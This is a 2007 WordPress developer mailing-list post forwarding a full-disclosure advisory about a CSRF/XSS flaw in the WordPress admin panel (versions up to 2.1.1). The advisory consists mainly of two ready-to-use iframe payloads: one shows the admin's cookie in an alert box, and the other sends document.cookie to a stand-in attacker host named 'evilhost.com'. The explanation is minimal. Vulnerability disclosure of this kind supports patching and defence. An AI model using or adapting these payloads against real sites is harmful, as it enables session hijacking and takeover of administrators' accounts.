[wp-hackers] FW: [Full-disclosure] WordPress AdminPanel CSRF/XSS - 0day

Ross M. W. Bennetts ross.bennetts at une.edu.au
Tue Feb 27 00:15:51 GMT 2007 

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk
[mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of SaMuschie
Sent: Tuesday, 27 February 2007 7:51 AM
To: webappsec at securityfocus.com; bugtraq at securityfocus.com;
vuln-dev at securityfocus.com; full-disclosure at lists.grok.org.uk
Subject: [Full-disclosure] WordPress AdminPanel CSRF/XSS - 0day

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

+---------------------------------------------------------------------------
+
|               SaMuschie Research Labs proudly presents . . .
|  
+---------------------------------------------------------------------------
+
| Application: wordpress                            Version: <= 2.1.1
|  
| Vuln./Exploit Type: AdminPanel CSRF/XSS           Status: 0day
|  
+---------------------------------------------------------------------------
+
| Discovered by: Samenspender                       Released: 20070226
|  
| SaMuschie Release Number: 1
|  
+---------------------------------------------------------------------------
+

Exploit:

Cookie in an Alert Box:
<iframe width=600 height=400
src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript
%3Ealert(document.cookie)%3C/script%3E%3Clol=%27'></iframe>

Cookie send to an Evil Host:
<iframe width=600 height=400
src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript
%3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/
datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27'></ifra
me>

+---------------------------------------------------------------------------
+
|                           Lameness Disclaimer
|  
+---------------------------------------------------------------------------
+
| SaMuschie Research Labs was found to publish vulnerabilities within well
|  
| known software products, which are easy to discover and exploit.
|  
|
|  
| SaMuschie researchers just spend a minimum of time and knowledge for each
|
| vulnerability. Hence readers of this advisory are requested not to ask
|  
| any questions to the researchers.... they don't know the answer ;)
|  
+---------------------------------------------------------------------------
+
+---------------------------------------------------------------------------
+
| EOF
|  
+---------------------------------------------------------------------------
+
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF4xadMFgfGpQK8VERAkO5AJ9V8uosk2DATRTARHDhPxNe+RHirgCeKQ0h
aFgDpHnxPP+/4Ot5bLBZy9Q=
=/gS4
-----END PGP SIGNATURE-----

More information about the wp-hackers mailing list